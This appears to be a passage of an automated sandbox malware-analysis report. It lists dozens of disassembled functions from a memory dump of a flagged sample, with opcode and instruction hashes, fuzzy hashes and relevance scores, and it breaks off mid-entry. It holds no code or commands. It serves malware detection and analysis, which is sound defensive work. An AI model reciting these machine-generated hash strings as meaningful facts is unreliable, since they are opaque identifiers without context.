                                                    • Opcode ID: b3516d4e0119dbc66341f878d3221e280a6f867d86722b9aef068654e6521099
                                                    • Instruction ID: 95a9dc08ddcea4527b0aa8e1ece6fc41d7afd754fbe0d2eddd7bccc040f1570e
                                                    • Opcode Fuzzy Hash: b3516d4e0119dbc66341f878d3221e280a6f867d86722b9aef068654e6521099
                                                    • Instruction Fuzzy Hash: 0402AD63D2E33489E783B131C6917AA5E88DF231A6F21CF169837B19E17B1F4A8D44D4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033207F0 Relevance: 1.9, Strings: 1, Instructions: 640COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 46331b7b398fee31864be4a8e18056628003d857ba59a6e31619076e966ad9c8
                                                    • Instruction ID: 177caab5b3e415a5cef0ada187471fee2d2d87aaf82ab60f0d961a68b5deee3e
                                                    • Opcode Fuzzy Hash: 46331b7b398fee31864be4a8e18056628003d857ba59a6e31619076e966ad9c8
                                                    • Instruction Fuzzy Hash: 03E19AA3E2E33589E7D3B030C6917A65E88DF27186F22CF56983AB1D61771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320957 Relevance: 1.9, Strings: 1, Instructions: 608COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 5a0ac4661923808648d5e40a32112f9b4bb1523ecdf2aa926caa265adff1fcc2
                                                    • Instruction ID: 9bd306be78a226117dc6691c7030e7a585de2c47dfed1c396b9834695967e6f9
                                                    • Opcode Fuzzy Hash: 5a0ac4661923808648d5e40a32112f9b4bb1523ecdf2aa926caa265adff1fcc2
                                                    • Instruction Fuzzy Hash: BDE17AA3E2E335C9E7D3A030C6917A65E88DF27196F22CF569836B1D61771F4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320A63 Relevance: 1.8, Strings: 1, Instructions: 600COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: a6299100f0af4971c0a35d75b2802937ffc916c2d8dd5fb222bc1522ddaa8938
                                                    • Instruction ID: 4b804b4c126c41ceda90a9f91400e8475b10c08032dd570c30e3be7ba8293f8c
                                                    • Opcode Fuzzy Hash: a6299100f0af4971c0a35d75b2802937ffc916c2d8dd5fb222bc1522ddaa8938
                                                    • Instruction Fuzzy Hash: 1EE179A3E2E335C9E7D3A030C6917A65E88DF271C6F22CF5A9836B1961771F4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320C98 Relevance: 1.8, Strings: 1, Instructions: 590COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 8e8cc7e69db678f52791dd3f87ebaf57705d93fc8364691513eb56ff0c54a8b2
                                                    • Instruction ID: 555e32ebadaa92d61af864d01ee40c7d2edd481b1641d89c8c7a28cc45243b94
                                                    • Opcode Fuzzy Hash: 8e8cc7e69db678f52791dd3f87ebaf57705d93fc8364691513eb56ff0c54a8b2
                                                    • Instruction Fuzzy Hash: 56D178A3E2E335C9E793B030C6917A65E88DF271C6F22CB5A9836B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320894 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 10c84e74577f92c0f42a3057518343e2f89806d9fcad8fcf0ebc07e8bae73935
                                                    • Instruction ID: 7e1b707a9519fe623377be1fd7cff57c6668dab4c2e838258dba76ce7afd51a7
                                                    • Opcode Fuzzy Hash: 10c84e74577f92c0f42a3057518343e2f89806d9fcad8fcf0ebc07e8bae73935
                                                    • Instruction Fuzzy Hash: D2E18AA3E2E33589E7D3B030C6917A65E88DF27196F22CF56983AB1D61771F4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033207D1 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: d5fa9028508db55b9a06efc136fbc47292964c83e4b0cd36605fd78099a186bd
                                                    • Instruction ID: 5fc452bfbd04d6809b6e6541cc43df2afb4e9510e360ac8a76accea1813473b5
                                                    • Opcode Fuzzy Hash: d5fa9028508db55b9a06efc136fbc47292964c83e4b0cd36605fd78099a186bd
                                                    • Instruction Fuzzy Hash: A1E19AA3E2E33589E7D3B030C6917A65E88DF27196F22CF569836B1D61771F4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320E63 Relevance: 1.8, Strings: 1, Instructions: 568COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: ff5aa5695627e6d80317ea242a232ca7be90f64f8a0181573dcc306814a42f05
                                                    • Instruction ID: dfdab38d879019e5c449ac1ccbeee48d3349494089aadcf06a4e6d361049335b
                                                    • Opcode Fuzzy Hash: ff5aa5695627e6d80317ea242a232ca7be90f64f8a0181573dcc306814a42f05
                                                    • Instruction Fuzzy Hash: 8AD16BA3E2E33589E7D3B030C6917A65E89DF271C6F22CF5A9836B1961771F4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033209EA Relevance: 1.8, Strings: 1, Instructions: 557COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 83890b0464ea485996aaee5c66c645ea952f31d8d19e0d2c2f5b255e72a1bc1d
                                                    • Instruction ID: 3f01b5ea5e3fec6e437be254c2219d7115a6366dad2e7b058a8b3cc8f9a10ec1
                                                    • Opcode Fuzzy Hash: 83890b0464ea485996aaee5c66c645ea952f31d8d19e0d2c2f5b255e72a1bc1d
                                                    • Instruction Fuzzy Hash: 39E179A3E2E335C9E7D3B030C6917A65E88DF27186F22CF5A9836B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320AF2 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 850a3594c627d6da2e4b2d3b423583e3b6a3e7dc70b033a5657900e9ceedfe82
                                                    • Instruction ID: 7e9131d5f7e172ed0ab384db79859ccd9bbd89f7d173a09594268c85194ee0c4
                                                    • Opcode Fuzzy Hash: 850a3594c627d6da2e4b2d3b423583e3b6a3e7dc70b033a5657900e9ceedfe82
                                                    • Instruction Fuzzy Hash: 8AE189A3E2E335C9E7D3B030C6917A65E88DF27186F22CF5A9836B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320DB0 Relevance: 1.8, Strings: 1, Instructions: 524COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 96e0ed48de94e756fd2ee1bb62e9937228112be620120cc82094e339d5d838f1
                                                    • Instruction ID: 91c2418c630dcedd9facf757c92fa667a33840fb8a2d54c7a5f6e3c376024b4b
                                                    • Opcode Fuzzy Hash: 96e0ed48de94e756fd2ee1bb62e9937228112be620120cc82094e339d5d838f1
                                                    • Instruction Fuzzy Hash: B8D179A3E2E33589E7D3A030C6917A65E88DF271C6F22CF5A9836B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033216F6 Relevance: 1.8, Strings: 1, Instructions: 516COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: a04c03dcdf53a267b60ea3f4d78c9b9c1e65d3115027b6d0cbeeda6c73aa5328
                                                    • Instruction ID: de07beb914502436a6d458ba5aff7c9857d980a9e3524374baf36bcea0ed245a
                                                    • Opcode Fuzzy Hash: a04c03dcdf53a267b60ea3f4d78c9b9c1e65d3115027b6d0cbeeda6c73aa5328
                                                    • Instruction Fuzzy Hash: DAA17CA3D2E335D9E7D3B030CA917A65E88DF23186F128F5A9836F19617B1F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332131F Relevance: 1.8, Strings: 1, Instructions: 512COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 9aa59a96a0f945347941af5ee5a0642ae9c9f403918c785dabe710e421ec5fe3
                                                    • Instruction ID: 146187a28c6588679d90cb56eed08ad0392ef1c1707843f77c51d278fa104caf
                                                    • Opcode Fuzzy Hash: 9aa59a96a0f945347941af5ee5a0642ae9c9f403918c785dabe710e421ec5fe3
                                                    • Instruction Fuzzy Hash: 2EC18BA3D2A335D9E7D3B030CA917A65E88DF231C6F228F5A9836B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321118 Relevance: 1.8, Strings: 1, Instructions: 508COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: dbd8fa2fda67712ce7230710a0cfb6f94d60f2a4fba86fa9716be0aab570f04d
                                                    • Instruction ID: 8f54b6e194a965e1f218e1f0e7c024a8a16f63073cf7ece9e1489a022cf0d8d7
                                                    • Opcode Fuzzy Hash: dbd8fa2fda67712ce7230710a0cfb6f94d60f2a4fba86fa9716be0aab570f04d
                                                    • Instruction Fuzzy Hash: 16C17BA3D2E33589E7D3B030C6917A65E88DF271C6F22CF5A9826B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033211AC Relevance: 1.8, Strings: 1, Instructions: 506COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 4d2a9888de6381d85ca27eaef9b7568d203f1709f3023c5bc40f061d8760a47a
                                                    • Instruction ID: df4797adafa74e1298c9f7a8b01d354b0cf6381b9c5534f0c5721f2df89bb3b9
                                                    • Opcode Fuzzy Hash: 4d2a9888de6381d85ca27eaef9b7568d203f1709f3023c5bc40f061d8760a47a
                                                    • Instruction Fuzzy Hash: 8FC18CA3D2E33589E7D3B030C6917A65E88DF271C6F22CF5A983AB1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03320D0A Relevance: 1.8, Strings: 1, Instructions: 503COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 43a2eae67d3b5438e8459c9db72d33743b2431e36e1e11960c57cb0ed41d4487
                                                    • Instruction ID: f5621d3f0356817f2d3c4d35e6e645726ab4df4001e9651b0ae961fa28c015f3
                                                    • Opcode Fuzzy Hash: 43a2eae67d3b5438e8459c9db72d33743b2431e36e1e11960c57cb0ed41d4487
                                                    • Instruction Fuzzy Hash: 0ED18AA3E2A335C9E7D3B030C6917A65E89DF271C6F22CF5A9836B1961771F4A8D04C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033215DB Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 1b6e279087486edcdc6ea9712ed471db66ecda80f892bbe65946a59a25ab4de6
                                                    • Instruction ID: 13c71f3f343cf6c6981f9aaaa01ca8235675da29e6d06d472e06983cdaec0a39
                                                    • Opcode Fuzzy Hash: 1b6e279087486edcdc6ea9712ed471db66ecda80f892bbe65946a59a25ab4de6
                                                    • Instruction Fuzzy Hash: 81B16BA3D2E335D9E7D3B030CA917A65E88DF23186F218F5A9836F1961B71F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332188F Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 6c0d4c3ea4aff035a7b48d34b4f4802f3c0acd672e3689b1eab8b6c0fb1b7612
                                                    • Instruction ID: f644e5d438a670d0321b9519e8ede25a6e2cbed30271231a56486ae2fffe05e7
                                                    • Opcode Fuzzy Hash: 6c0d4c3ea4aff035a7b48d34b4f4802f3c0acd672e3689b1eab8b6c0fb1b7612
                                                    • Instruction Fuzzy Hash: 28A16BA3D2A335C9E7D3B030CA917A65E88DF23186F128F6A9836F1961771F4A4D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321245 Relevance: 1.7, Strings: 1, Instructions: 483COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 7c62d6c6bfbdc4e901d9bc5b0315570764b060841d2c2e7a750069afd67cb776
                                                    • Instruction ID: 27f86c332549ec62ca05f2c04ca684c26f3a3396864c5dbe912f9bffbae5c532
                                                    • Opcode Fuzzy Hash: 7c62d6c6bfbdc4e901d9bc5b0315570764b060841d2c2e7a750069afd67cb776
                                                    • Instruction Fuzzy Hash: 99C17CA3D2E335D9E7D3B030C6917A65E88DF231C6F22CF5A982AB1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321537 Relevance: 1.7, Strings: 1, Instructions: 465COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: b9f748be382cb7414db9b218b39c03edf97695b124c2ede856a66e1597b9ca0b
                                                    • Instruction ID: bea151f91969aeab4697c66d1f7beb343fa06ae07fd32616ed767434a516ad89
                                                    • Opcode Fuzzy Hash: b9f748be382cb7414db9b218b39c03edf97695b124c2ede856a66e1597b9ca0b
                                                    • Instruction Fuzzy Hash: BCB17CA3D2E335D9E7D3B030CA917A65E88DF23186F228F5A9836F1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033214BF Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 19e0711240ef8936a2c7a89d818dd735a1e534239d8206699ca2fad9294bea5b
                                                    • Instruction ID: e5055ff7f3059368f9719d042549f8ba692228f4f35d398a63d704cb8eed5a2a
                                                    • Opcode Fuzzy Hash: 19e0711240ef8936a2c7a89d818dd735a1e534239d8206699ca2fad9294bea5b
                                                    • Instruction Fuzzy Hash: 49B15BA3D2E335D9E7D3B030CA917E65E88DF23186F228F5A9826B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321436 Relevance: 1.7, Strings: 1, Instructions: 442COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 9e102dca2693f6c111ec42cf5eb63d70ad0afd83f982cfa7e63e5103d214a76a
                                                    • Instruction ID: d3fe797319ff325592055a919a072065c6c2728d62ee1abba0869ac21d545a60
                                                    • Opcode Fuzzy Hash: 9e102dca2693f6c111ec42cf5eb63d70ad0afd83f982cfa7e63e5103d214a76a
                                                    • Instruction Fuzzy Hash: 65B16BA3D2A335D9E7D3B030CA917E65E88DF23186F128F5A9836B1961B71F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033212BB Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: c02ecb45d7d2800e142340657000a616dddb2a3eb2aff08d8c4ee0cc4f709cff
                                                    • Instruction ID: 347a08fda2204f323c33c3d7359ccc674042db417ad1f59e6fe01e2136e4de86
                                                    • Opcode Fuzzy Hash: c02ecb45d7d2800e142340657000a616dddb2a3eb2aff08d8c4ee0cc4f709cff
                                                    • Instruction Fuzzy Hash: 33C17CA3D2E335D9E7D3B030C6917A65E88DF23186F228F5A9826B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332139C Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 581f8c313cd633a1b6cc484a26462d99815c72f5117fd1e63dee74517d7c423f
                                                    • Instruction ID: e2d443a55e15a7bddc9f865d4dbb0e7b3fa27fd125c3d8e5cbd320f503960165
                                                    • Opcode Fuzzy Hash: 581f8c313cd633a1b6cc484a26462d99815c72f5117fd1e63dee74517d7c423f
                                                    • Instruction Fuzzy Hash: A7B17DA3D2E335D9E7D3B030CA917A65E88DF231C6F228F5A9826B1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321665 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 49ca033577dd9156738fb48c9ef8922f5ef156a3e88c754e0bfb697c237ef9c6
                                                    • Instruction ID: f4856e367d2b9faedecf9f284b9ebe799a5f78f518152b76b1e670f3ab356aa5
                                                    • Opcode Fuzzy Hash: 49ca033577dd9156738fb48c9ef8922f5ef156a3e88c754e0bfb697c237ef9c6
                                                    • Instruction Fuzzy Hash: 78A18CA3D2E335D9E7D3A030CA917E65E88DF23186F128F5A983AF1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321929 Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 601b89ddca829b3756b32ef3c0f78a65d358d109bcabc98bc4ea9ab604724f4d
                                                    • Instruction ID: c5c4e39db8af445da05db6025684ddd090af1b1f9a435375d5a31998e45f01d8
                                                    • Opcode Fuzzy Hash: 601b89ddca829b3756b32ef3c0f78a65d358d109bcabc98bc4ea9ab604724f4d
                                                    • Instruction Fuzzy Hash: C8918CA3D2A335C9E7D3A030CA917A65E88DF23186F128F6A9837F1961771F4A4D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03321F44 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: ede8925e89efde1f30f14e55dccaf6d62a2b4c589b46d029cf915a22b58ffeb4
                                                    • Instruction ID: 9f64936a3954495386725ad238a369cfaff35b5c8185b6debd2c961314c04d40
                                                    • Opcode Fuzzy Hash: ede8925e89efde1f30f14e55dccaf6d62a2b4c589b46d029cf915a22b58ffeb4
                                                    • Instruction Fuzzy Hash: 5E618BB3D2A739C9E7D3A020CAD17A25F88EF23186F218F599837E1961B71F4A4D4584
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033217A0 Relevance: 1.7, Strings: 1, Instructions: 418COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: u}N;
                                                    • API String ID: 0-4269670174
                                                    • Opcode ID: 3138c8ce43891c578eade231308053cb79d26c3c100913caf724b62848eebee8
                                                    • Instruction ID: 96e34c8e846a9e1c636215fd7c9f7b22057c238e5f4d3b5c530e985dae048590
                                                    • Opcode Fuzzy Hash: 3138c8ce43891c578eade231308053cb79d26c3c100913caf724b62848eebee8
                                                    • Instruction Fuzzy Hash: 6FA18BA3D2E335D9E7D3B030CA917A65E88DF23186F228F5A9836F1961771F4A8D05C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332DB35 Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: |o
